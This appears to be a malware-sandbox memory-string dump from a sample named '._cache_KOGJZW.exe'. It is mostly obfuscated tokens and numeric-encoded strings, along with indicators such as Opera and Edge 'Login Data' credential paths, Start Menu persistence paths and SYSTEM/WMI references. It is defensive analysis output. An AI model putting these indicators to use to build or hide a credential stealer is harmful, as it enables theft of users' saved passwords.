Source: ._cache_KOGJZW.exe, 00000002.00000002.2596087839.0000000000B6E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: p5ky5bb7a	memstr_d63d93f4-3
Source: ._cache_KOGJZW.exe, 00000002.00000002.2596087839.0000000000B6E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: t6pm6ok4c1c	memstr_0875bd0a-e
Source: ._cache_KOGJZW.exe, 00000002.00000002.2596087839.0000000000B6E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: p7wv9jf9ln1c	memstr_cc429c0b-c
Source: ._cache_KOGJZW.exe, 00000002.00000002.2596087839.0000000000B6E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: b5ra1zk1in5y0	memstr_7da1fc21-a
Source: ._cache_KOGJZW.exe, 00000002.00000002.2596087839.0000000000B6E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: o7qm6ar3wn8f5	memstr_0d765bcd-9
Source: ._cache_KOGJZW.exe, 00000002.00000002.2596087839.0000000000B6E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: z3pw6jo3mh6r:	memstr_c6e0f572-3
Source: ._cache_KOGJZW.exe, 00000002.00000002.2596087839.0000000000B6E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: i8ql4sc1i6r?	memstr_68afff90-8
Source: ._cache_KOGJZW.exe, 00000002.00000002.2596087839.0000000000B6E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: t6pm6ok4c6q$	memstr_3c029a59-1
Source: ._cache_KOGJZW.exe, 00000002.00000002.2596087839.0000000000B6E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: k3mh0pi3cr6q)	memstr_ef8e58df-c
Source: ._cache_KOGJZW.exe, 00000002.00000002.2596087839.0000000000B6E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 211730721m211730698m211730691m211730699m211730700m211730699m211730700m211730693m211730735m211730701m211730694m211730695m211730721m211730721m211730735m	memstr_00e48d45-3
Source: ._cache_KOGJZW.exe, 00000002.00000002.2596087839.0000000000B6E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 211730721m211730698m211730691m211730699m211730700m211730699m211730700m211730693m211730735m211730701m211730694m211730695m211730721m211730724m211730720m	memstr_e815e3f6-8
Source: ._cache_KOGJZW.exe, 00000002.00000002.2596087839.0000000000B6E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 211730721m211730698m211730691m211730699m211730700m211730699m211730700m211730693m211730735m211730701m211730694m211730695m211730727m211730721m211730720m	memstr_2d9a5156-4
Source: ._cache_KOGJZW.exe, 00000002.00000002.2596087839.0000000000B6E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 211730729m211730695m211730715m211730733m211730688m211730696m211730695m211730689m211730710m211730734m211730695m211730700m211730693m211730710m2117306988&	memstr_121fac92-c
Source: ._cache_KOGJZW.exe, 00000002.00000002.2596087839.0000000000B6E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 211730689m211730704m211730715m211730706m211730710m211730769m211730768m211730764m211730694m211730702m21173070221e	memstr_adac5674-a
Source: ._cache_KOGJZW.exe, 00000002.00000002.2596087839.0000000000B6E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 211730735m211730711m211730702m211730710m211730699m211730733m211730688m211730696m211730695m211730689m211730710m211730734m211730695m211730700m211730693m211730710m211730698	memstr_047a6d63-9
Source: ._cache_KOGJZW.exe, 00000002.00000002.2596087839.0000000000B6E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 211730721m211730698m211730691m211730699m211730700m211730699m211730700m211730693m211730735m211730701m211730694m211730695m211730732m211730765m211730723k	memstr_606f4659-8
Source: ._cache_KOGJZW.exe, 00000002.00000002.2596087839.0000000000B6E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: c4ev1wn2p	memstr_e6c5e7e8-1
Source: ._cache_KOGJZW.exe, 00000002.00000002.2596087839.0000000000B6E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: m6uo6sb8nj1p	memstr_3544113f-9
Source: ._cache_KOGJZW.exe, 00000002.00000002.2596087839.0000000000B6E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: t6pm6ok4c6q0	memstr_936bf7b8-2
Source: ._cache_KOGJZW.exe, 00000002.00000002.2596087839.0000000000B6E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: b5ra1zk1in5y5	memstr_6d4a8bbd-5
Source: ._cache_KOGJZW.exe, 00000002.00000002.2596087839.0000000000B6E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: k3mh0pi3cr6q:	memstr_83070ea7-9
Source: ._cache_KOGJZW.exe, 00000002.00000002.2596087839.0000000000B6E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: b5ra1zk1in5y?	memstr_429b647f-6
Source: ._cache_KOGJZW.exe, 00000002.00000002.2596087839.0000000000B6E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: o7qm6ar3wn8f$	memstr_cca82bc0-7
Source: ._cache_KOGJZW.exe, 00000002.00000002.2596087839.0000000000B6E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: k3mh0pi3cr6q.	memstr_2c2b1a06-9
Source: ._cache_KOGJZW.exe, 00000002.00000002.2596087839.0000000000B6E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: u1bb8jt3yo5ms	memstr_6c4e3273-8
Source: ._cache_KOGJZW.exe, 00000002.00000002.2596087839.0000000000B6E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: b5ra1zk1in5yx	memstr_146d59d3-8
Source: ._cache_KOGJZW.exe, 00000002.00000002.2596087839.0000000000B6E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: i8ql4sc1i]	memstr_732c2bb2-f
Source: ._cache_KOGJZW.exe, 00000002.00000002.2596087839.0000000000B6E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: t6pm6ok4c8fb	memstr_a4115547-4
Source: ._cache_KOGJZW.exe, 00000002.00000002.2596087839.0000000000B6E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: o7qm6ar3wn8fg	memstr_7a33542d-f
Source: ._cache_KOGJZW.exe, 00000002.00000002.2596087839.0000000000B6E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: t6pm6ok4cl	memstr_57823855-3
Source: ._cache_KOGJZW.exe, 00000002.00000002.2596087839.0000000000B6E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: o7qm6ar3wn8fq	memstr_9c4e288c-4
Source: ._cache_KOGJZW.exe, 00000002.00000002.2596087839.0000000000B6E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: i8ql4sc1iv	memstr_4e7f6574-a
Source: ._cache_KOGJZW.exe, 00000002.00000002.2596087839.0000000000B6E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: t6pm6ok4c{	memstr_f1fad76d-2
Source: ._cache_KOGJZW.exe, 00000002.00000002.2596087839.0000000000B6E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: t6pm6ok4c6q`	memstr_95e38bc7-5
Source: ._cache_KOGJZW.exe, 00000002.00000002.2596087839.0000000000B6E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: k3mh0pi3cr6qe	memstr_85a2a09f-d
Source: ._cache_KOGJZW.exe, 00000002.00000002.2596087839.0000000000B6E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: i8ql4sc1ij	memstr_cfdb5a77-3
Source: ._cache_KOGJZW.exe, 00000002.00000002.2596087839.0000000000B6E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: o7qm6ar3wn8fo	memstr_3955c328-9
Source: ._cache_KOGJZW.exe, 00000002.00000002.2596087839.0000000000B6E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: o5hl4si2o5y	memstr_f6097193-a
Source: ._cache_KOGJZW.exe, 00000002.00000002.2596087839.0000000000B6E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: t6pm6ok4c7d	memstr_adff0c10-b
Source: ._cache_KOGJZW.exe, 00000002.00000002.2596087839.0000000000B6E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: f0yu1op2ya7d	memstr_79c5cbb9-3
Source: ._cache_KOGJZW.exe, 00000002.00000002.2596087839.0000000000B6E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: k3mh0pi3cr6qi	memstr_b8e093eb-d
Source: ._cache_KOGJZW.exe, 00000002.00000002.2596087839.0000000000B6E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 211730726m211730737m211730723m211730738m211730691m211730704m211730691m211730703m211730695m211730710m211730695m211730704m211730705	memstr_8731f620-5
Source: ._cache_KOGJZW.exe, 00000002.00000002.2596087839.0000000000B6E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 211730730m211730691m211730705m211730698m211730720m211730702m211730701m211730689m211730697m211730734m211730695m211730700m211730693m211730710m21173069821m	memstr_cf66e407-1
Source: ._cache_KOGJZW.exe, 00000002.00000002.2596087839.0000000000B6E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 211730710m211730698e	memstr_fe637fc5-7
Source: ._cache_KOGJZW.exe, 00000002.00000002.2596087839.0000000000B6E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 211730727m211730692m211730692m211730695m211730689m211730710m211730699m211730708m211730695m211730729m211730695m211730715m211730734m211730695m211730700m211730693m211730710m211730698w	memstr_c736ed50-7
Source: ._cache_KOGJZW.exe, 00000002.00000002.2596087839.0000000000B6E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 211730729m211730695m211730715m211730737m211730710m211730704m211730695m211730700m211730693m211730710m21173069821f	memstr_517b7885-e
Source: ._cache_KOGJZW.exe, 00000002.00000002.2596087839.0000000000B6E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 211730730m211730691m211730705m211730698m211730726m211730699m211730693m211730695m211730705m211730710m211730734m211730695m211730700m211730693m211730710m211730698	memstr_04ce66c8-9
Source: ._cache_KOGJZW.exe, 00000002.00000002.2596087839.0000000000B6E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: s1ai4mt1l	memstr_0e04182c-9
Source: ._cache_KOGJZW.exe, 00000002.00000002.2596087839.0000000000B6E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: t6pm6ok4c4	memstr_6a8d5838-3
Source: ._cache_KOGJZW.exe, 00000002.00000002.2596087839.0000000000B6E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: k3mh0pi3cr6q9	memstr_c10dec7e-2
Source: ._cache_KOGJZW.exe, 00000002.00000002.2596087839.0000000000B6E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: t6pm6ok4c>	memstr_2773d991-c
Source: ._cache_KOGJZW.exe, 00000002.00000002.2596087839.0000000000B6E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: i8ql4sc1i8f#	memstr_00b83bfe-4
Source: ._cache_KOGJZW.exe, 00000002.00000002.2596087839.0000000000B6E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: b5ra1zk1in5y(	memstr_521ecccb-0
Source: ._cache_KOGJZW.exe, 00000002.00000002.2596087839.0000000000B6E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: i8ql4sc1i-	memstr_b4871802-5
Source: ._cache_KOGJZW.exe, 00000002.00000002.2596087839.0000000000B6E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: i8ql4sc1i8fr	memstr_28054deb-8
Source: ._cache_KOGJZW.exe, 00000002.00000002.2596087839.0000000000B6E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: o7qm6ar3wn8f\	memstr_08c3256f-a
Source: ._cache_KOGJZW.exe, 00000002.00000002.2596087839.0000000000B6E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: o7qm6ar3wn8fa	memstr_8c3c6f9f-7
Source: ._cache_KOGJZW.exe, 00000002.00000002.2596087839.0000000000B6E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: i8ql4sc1i8ff	memstr_89f829eb-6
Source: ._cache_KOGJZW.exe, 00000002.00000002.2596087839.0000000000B6E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: k3mh0pi3cr6qp	memstr_c3ed9a19-f
Source: ._cache_KOGJZW.exe, 00000002.00000002.2596087839.0000000000B6E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: o7qm6ar3wn8fu	memstr_a2b45b40-d
Source: ._cache_KOGJZW.exe, 00000002.00000002.2596087839.0000000000B6E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: t6pm6ok4c6qz	memstr_a5e0df04-a
Source: ._cache_KOGJZW.exe, 00000002.00000002.2596087839.0000000000B6E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: i8ql4sc1id	memstr_5d61d396-d
Source: ._cache_KOGJZW.exe, 00000002.00000002.2596087839.0000000000B6E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: b5ra1zk1in5yi	memstr_13b7d951-d
Source: ._cache_KOGJZW.exe, 00000002.00000002.2596087839.0000000000B6E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: k3mh0pi3cr6qn	memstr_1574f260-8
Source: ._cache_KOGJZW.exe, 00000002.00000002.2596087839.0000000000B6E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: i8ql4sc1i3	memstr_16938bfd-8
Source: ._cache_KOGJZW.exe, 00000002.00000002.2596087839.0000000000B6E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: o7qm6ar3wn8f=	memstr_870b9494-5
Source: ._cache_KOGJZW.exe, 00000002.00000002.2596087839.0000000000B6E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: b5ra1zk1in5y"	memstr_c3213f85-4
Source: ._cache_KOGJZW.exe, 00000002.00000002.2596087839.0000000000B6E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: v0ym9ik5cm3q,	memstr_2f1c5695-f
Source: ._cache_KOGJZW.exe, 00000002.00000002.2596087839.0000000000B6E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: o7qm6ar3wn8fq	memstr_1a63e640-c
Source: ._cache_KOGJZW.exe, 00000002.00000002.2596087839.0000000000B6E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: i8ql4sc1iv	memstr_da2c0f8a-0
Source: ._cache_KOGJZW.exe, 00000002.00000002.2596087839.0000000000B6E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: e1ec9ug1h5y[	memstr_8cbeb5da-5
Source: ._cache_KOGJZW.exe, 00000002.00000002.2596087839.0000000000B6E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: k3mh0pi3cr6q@	memstr_73d0a236-1
Source: ._cache_KOGJZW.exe, 00000002.00000002.2596087839.0000000000B6E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: m1ar1nt6je	memstr_56bae221-f
Source: ._cache_KOGJZW.exe, 00000002.00000002.2596087839.0000000000B6E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: b5ra1zk1in5yj	memstr_fcd79f8f-4
Source: ._cache_KOGJZW.exe, 00000002.00000002.2596087839.0000000000B6E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: t6pm6ok4c6qo	memstr_b456d083-2
Source: ._cache_KOGJZW.exe, 00000002.00000002.2596087839.0000000000B6E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: i8ql4sc1it	memstr_146892db-e
Source: ._cache_KOGJZW.exe, 00000002.00000002.2596087839.0000000000B6E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: t6pm6ok4c6qy	memstr_feefd3ca-0
Source: ._cache_KOGJZW.exe, 00000002.00000002.2596087839.0000000000B6E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: b5ra1zk1in5yh	memstr_85010ae3-9
Source: ._cache_KOGJZW.exe, 00000002.00000002.2596087839.0000000000B6E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: o7qm6ar3wn8fm	memstr_682ddd4a-4
Source: ._cache_KOGJZW.exe, 00000002.00000002.2596087839.0000000000B6E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: b5ra1zk1in5yk	memstr_db8eb5d7-4
Source: ._cache_KOGJZW.exe, 00000002.00000002.2596087839.0000000000B6E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 211730706m211730710m211730704m211730754m211730754m211730754m211730754m211730706m211730688m211730732m211730701m211730700m211730689m211730695m21173077721_	memstr_62087e6b-c
Source: ._cache_KOGJZW.exe, 00000002.00000002.2596087839.0000000000B6E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 211730750m211730705m211730707m211730778m211730764m211730694m211730702m211730702k	memstr_b5ab0866-1
Source: ._cache_KOGJZW.exe, 00000002.00000002.2596087839.0000000000B6E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: nt authority\system	memstr_e62fe263-3
Source: ._cache_KOGJZW.exe, 00000002.00000002.2596087839.0000000000B6E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: wbem class object	memstr_0169981c-2
Source: ._cache_KOGJZW.exe, 00000002.00000002.2596087839.0000000000B6E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: @7&v8	memstr_2618c07a-3
Source: ._cache_KOGJZW.exe, 00000002.00000002.2596087839.0000000000B6E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: @7&v4	memstr_f6262a44-4
Source: ._cache_KOGJZW.exe, 00000002.00000002.2596087839.0000000000B6E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: wmi object factory0	memstr_848c7415-a
Source: ._cache_KOGJZW.exe, 00000002.00000002.2596087839.0000000000B6E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: wmi object factory6	memstr_cf77544f-8
Source: ._cache_KOGJZW.exe, 00000002.00000002.2596087839.0000000000B6E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: grwx(	memstr_3ba85657-d
Source: ._cache_KOGJZW.exe, 00000002.00000002.2596087839.0000000000B6E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: universal refresher@	memstr_a804e5c1-1
Source: ._cache_KOGJZW.exe, 00000002.00000002.2596087839.0000000000B6E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: :nt0xi	memstr_a3660e9a-e
Source: ._cache_KOGJZW.exe, 00000002.00000002.2596087839.0000000000B6E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: tmp=c:\users\user\appdata\local\temp>	memstr_430dbaec-f
Source: ._cache_KOGJZW.exe, 00000002.00000002.2596087839.0000000000B6E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: programfiles=c:\program files (x86)p	memstr_afcbb627-c
Source: ._cache_KOGJZW.exe, 00000002.00000002.2596087839.0000000000B6E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: comspec=c:\windows\system32\cmd.exev	memstr_ac197411-f
Source: ._cache_KOGJZW.exe, 00000002.00000002.2596087839.0000000000B6E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: kerberos	memstr_506259e1-f
Source: ._cache_KOGJZW.exe, 00000002.00000002.2596087839.0000000000B6E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: aw1.3.14.3.2.7	memstr_2d9a3d4d-6
Source: ._cache_KOGJZW.exe, 00000002.00000002.2596087839.0000000000B6E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: negotiateamlmem	memstr_3e5cd2d9-6
Source: ._cache_KOGJZW.exe, 00000002.00000002.2596087839.0000000000B6E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 813848	memstr_eef72b63-7
Source: ._cache_KOGJZW.exe, 00000002.00000002.2596087839.0000000000B6E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: schannelalolmem	memstr_239f2390-1
Source: ._cache_KOGJZW.exe, 00000002.00000002.2596087839.0000000000B6E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144cc	memstr_f52f4a4a-9
Source: ._cache_KOGJZW.exe, 00000002.00000002.2596087839.0000000000B6E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: _6.0.19041.1110_none_a8625c1886757984\:	memstr_036a148e-a
Source: ._cache_KOGJZW.exe, 00000002.00000002.2596087839.0000000000B6E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 211730720	memstr_e4b7ecc8-1
Source: ._cache_KOGJZW.exe, 00000002.00000002.2596087839.0000000000B6E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: d:p(a;oici;fa;;;sy)(a;oici;fa;;;ba)(a;oici;gxgr;;;bu)(a;oici;gxgr;;;wd)v	memstr_f91f031b-8
Source: ._cache_KOGJZW.exe, 00000002.00000002.2596087839.0000000000B6E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 211730721rok\appdata\roaming\microsoft\windows\start menu\programsi	memstr_fc06ec32-c
Source: ._cache_KOGJZW.exe, 00000002.00000002.2596087839.0000000000B6E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: c:\users\user\appdata\roaming\opera software\opera stable\login data\|	memstr_e029860a-6
Source: ._cache_KOGJZW.exe, 00000002.00000002.2596087839.0000000000B6E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 211730738rok\appdata\roaming\microsoft\internet explorer\quick launch	memstr_662fd72c-7
Source: ._cache_KOGJZW.exe, 00000002.00000002.2596087839.0000000000B6E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: c:\users\user\appdata\local\microsoft\edge\user data\default\login data	memstr_2a3c6710-5
Source: ._cache_KOGJZW.exe, 00000002.00000002.2596087839.0000000000B6E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: c:\users\user\appdata\roaming\microsoft\windows\start menu\programs	memstr_97e477f8-5
Source: ._cache_KOGJZW.exe, 00000002.00000002.2596087839.0000000000B6E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 211730741t%\system32\fwpuclnt.dlloft\internet explorer\quick launch	memstr_71fe78d2-7
Source: ._cache_KOGJZW.exe, 00000002.00000002.2596087839.0000000000B6E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 211730743;fa;;;sy)(a;oici;fa;;;ba)(a;oici;gxgr;;;bu)(a;oici;gxgr;;;wd)	memstr_aaf4a790-a
Source: ._cache_KOGJZW.exe, 00000002.00000002.2596087839.0000000000B6E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 211730736le%\appdata\roaming\microsoft\windows\start menu\programs	memstr_588208a9-4
Source: ._cache_KOGJZW.exe, 00000002.00000002.2596087839.0000000000B6E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 211730729rok\appdata\roaming\microsoft\internet explorer\quick launch	memstr_31224895-1
Source: ._cache_KOGJZW.exe, 00000002.00000002.2596087839.0000000000B6E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: c:\users\user\appdata\roaming\microsoft\internet explorer\quick launch:	memstr_d20978fa-a
Source: ._cache_KOGJZW.exe, 00000002.00000002.2596087839.0000000000B6E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 211730738 = "._cache_kogjzw.exe"	memstr_41da2373-a
Source: ._cache_KOGJZW.exe, 00000002.00000002.2596087839.0000000000B6E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: mdrive=c:systemroot=c:\windows-	memstr_4c8ac2b2-f
Source: ._cache_KOGJZW.exe, 00000002.00000002.2596087839.0000000000B6E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 211730689@	memstr_1efb5553-8
Source: ._cache_KOGJZW.exe, 00000002.00000002.2596087839.0000000000B6E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 211730737f	memstr_220ff9f7-6
Source: ._cache_KOGJZW.exe, 00000002.00000002.2596087839.0000000000B6E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 211730736_notify_event_{f30e2bda-488c-4115-a63b-b10ac4f8acad}	memstr_0644cdd9-3
Source: ._cache_KOGJZW.exe, 00000002.00000002.2596087839.0000000000B6E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 211730731	memstr_eff566bd-e
Source: ._cache_KOGJZW.exe, 00000002.00000002.2596087839.0000000000B6E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 211730738	memstr_801e9b4f-7
Source: ._cache_KOGJZW.exe, 00000002.00000002.2596087839.0000000000B6E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: -+ncalrpc:[ole35695ad831e3160983fe291cf7aa]k	memstr_5e0a4879-a
Source: ._cache_KOGJZW.exe, 00000002.00000002.2601484342.0000000004154000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: l0vx1qt7gw5s	memstr_c417c083-5
Source: ._cache_KOGJZW.exe, 00000002.00000002.2601484342.0000000004154000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: f6er8ay8yw7b	memstr_2185551b-a
Source: ._cache_KOGJZW.exe, 00000002.00000002.2601484342.0000000004154000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: p8is8ce0n	memstr_55b53c5d-7
Source: ._cache_KOGJZW.exe, 00000002.00000002.2601484342.0000000004154000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: u7su4pz2tc4l	memstr_a24eb479-8
Source: ._cache_KOGJZW.exe, 00000002.00000002.2601484342.0000000004154000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: o9pd2jc4fv5m	memstr_db0f4be4-4
Source: ._cache_KOGJZW.exe, 00000002.00000002.2601484342.0000000004154000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: q9di2gh4iq9j	memstr_955036c7-7
Source: ._cache_KOGJZW.exe, 00000002.00000002.2601484342.0000000004154000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: o6ed3qk8x6f	memstr_3ce67ee9-1
Source: ._cache_KOGJZW.exe, 00000002.00000002.2601484342.0000000004154000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: p9ar9th2kq8i	memstr_0ebb8076-b
Source: ._cache_KOGJZW.exe, 00000002.00000002.2601484342.0000000004154000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: s0mc1gu9i	memstr_165a6661-d
Source: ._cache_KOGJZW.exe, 00000002.00000002.2601484342.0000000004154000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: t0ua3zu6z6f2	memstr_b27d4245-1
Source: ._cache_KOGJZW.exe, 00000002.00000002.2601484342.0000000004154000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: l3ek7by3es5tgu	memstr_6213d157-2
Source: ._cache_KOGJZW.exe, 00000002.00000002.2601484342.0000000004154000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: n7em0fb9j_	memstr_6cbd4526-1
Source: ._cache_KOGJZW.exe, 00000002.00000002.2601484342.0000000004154000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: m1ro9fe7bd	memstr_4cb6d5b6-e
Source: ._cache_KOGJZW.exe, 00000002.00000002.2601484342.0000000004154000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: n4uc2zs6tn	memstr_49ef626e-7
Source: ._cache_KOGJZW.exe, 00000002.00000002.2601484342.0000000004154000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: x8lv4hx1jg8bs	memstr_2cf440f4-a
Source: ._cache_KOGJZW.exe, 00000002.00000002.2601484342.0000000004154000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: m8ju9vm7wx	memstr_ea38ff8b-0
Source: ._cache_KOGJZW.exe, 00000002.00000002.2601484342.0000000004154000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: f3oa6oq1t}	memstr_95070fed-2
Source: ._cache_KOGJZW.exe, 00000002.00000002.2601484342.0000000004154000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: q6pz6sh7ub	memstr_b9cece9b-e
Source: ._cache_KOGJZW.exe, 00000002.00000002.2601484342.0000000004154000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: m1ro9fe7b8bteg	memstr_3b86ac05-3
Source: ._cache_KOGJZW.exe, 00000002.00000002.2601484342.0000000004154000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: x8lv4hx1jg8bl	memstr_a1c9b19e-f
Source: ._cache_KOGJZW.exe, 00000002.00000002.2601484342.0000000004154000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: x8lv4hx1jg8b	memstr_baea34a1-6
Source: ._cache_KOGJZW.exe, 00000002.00000002.2601484342.0000000004154000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: f5pt6yp1og9c	memstr_c6afdbaf-a
Source: ._cache_KOGJZW.exe, 00000002.00000002.2601484342.0000000004154000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: m1ro9fe7b	memstr_75effd16-8
Source: ._cache_KOGJZW.exe, 00000002.00000002.2601484342.0000000004154000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: etstatesg	memstr_69d3a65c-f
Source: ._cache_KOGJZW.exe, 00000002.00000002.2601484342.0000000004154000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: n4uc2zs6t	memstr_2501f7e3-1
Source: ._cache_KOGJZW.exe, 00000002.00000002.2601484342.0000000004154000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: q4ii5bj6td4h	memstr_71068263-b
Source: ._cache_KOGJZW.exe, 00000002.00000002.2601484342.0000000004154000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: w2oy6le5ug2l	memstr_a198c915-c
Source: ._cache_KOGJZW.exe, 00000002.00000002.2601484342.0000000004154000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: i8ql4sc1i8f	memstr_1bce4f8a-7
